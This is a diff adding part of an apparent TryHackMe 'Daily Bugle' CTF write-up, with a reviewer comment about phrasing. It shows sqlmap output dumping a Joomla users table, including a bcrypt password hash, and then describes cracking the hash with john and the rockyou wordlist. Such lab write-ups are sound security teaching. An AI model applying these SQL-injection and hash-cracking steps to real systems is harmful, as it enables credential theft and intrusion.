content/post/daily-bugle-boot2-root-writeup copy.md

```diff
@@ -0,0 +1,736 @@
+[21:36:01] [INFO] adding words used on web page to the check list
+please enter number of threads? [Enter for 1 (current)] 4
+[21:36:14] [INFO] starting 4 threads
+[21:36:15] [INFO] retrieved: id
+[21:36:15] [INFO] retrieved: name
+[21:36:15] [INFO] retrieved: username
+[21:36:15] [INFO] retrieved: email
+[21:36:15] [INFO] retrieved: password
+[21:36:15] [INFO] retrieved: block
+[21:36:16] [INFO] retrieved: sendEmail
+[21:36:16] [INFO] retrieved: registerDate
+[21:36:16] [INFO] retrieved: lastvisitDate
+[21:36:16] [INFO] retrieved: activation
+[21:36:16] [INFO] retrieved: params
+[21:36:23] [INFO] fetching entries for table '#__users' in database 'joomla'
+[21:36:23] [INFO] retrieved: '0'
+[21:36:23] [INFO] retrieved: '0'
+[21:36:23] [INFO] retrieved: 'jonah@tryhackme.com'
+[21:36:23] [INFO] retrieved: '811'
+[21:36:23] [INFO] retrieved: '2019-12-15 23:58:06'
+[21:36:23] [INFO] retrieved: 'Super User'
+[21:36:23] [INFO] retrieved: ''
+[21:36:24] [INFO] retrieved: '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
+[21:36:24] [INFO] retrieved: '2019-12-14 20:43:49'
+[21:36:24] [INFO] retrieved: '1'
+[21:36:24] [INFO] retrieved: 'jonah'
+Database: joomla
+Table: #__users
+[1 entry]
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+| id  | name       | block | email               | params  | password                                                     | username | sendEmail | activation | registerDate        | lastvisitDate       |
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+| 811 | Super User | 0     | jonah@tryhackme.com | <blank> | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm | jonah    | 1         | 0          | 2019-12-14 20:43:49 | 2019-12-15 23:58:06 |
++-----+------------+-------+---------------------+---------+--------------------------------------------------------------+----------+-----------+------------+---------------------+---------------------+
+
+[21:36:24] [INFO] table 'joomla.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.162.223/dump/joomla/#__users.csv'
+[21:36:24] [WARNING] HTTP error codes detected during run:
+500 (Internal Server Error) - 93 times
+[21:36:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.162.223'
+
+[*] ending @ 21:36:24 /2020-11-27/
+```
+
+This returned what looked like a valid set of hashed credentials. I decided to run the credentials through `john` using the rockyou wordlist to see if I could identify the user's password.
+
+### Cracking the hash
+I ran `john` with a parallelism of 2 due to my attack host's 2 vcpus and walked away to let this run. Eventually I was lucky to obtain a match.
```

Comment:
Unsurprisingly, I ended up getting a match.

I feel like that works better here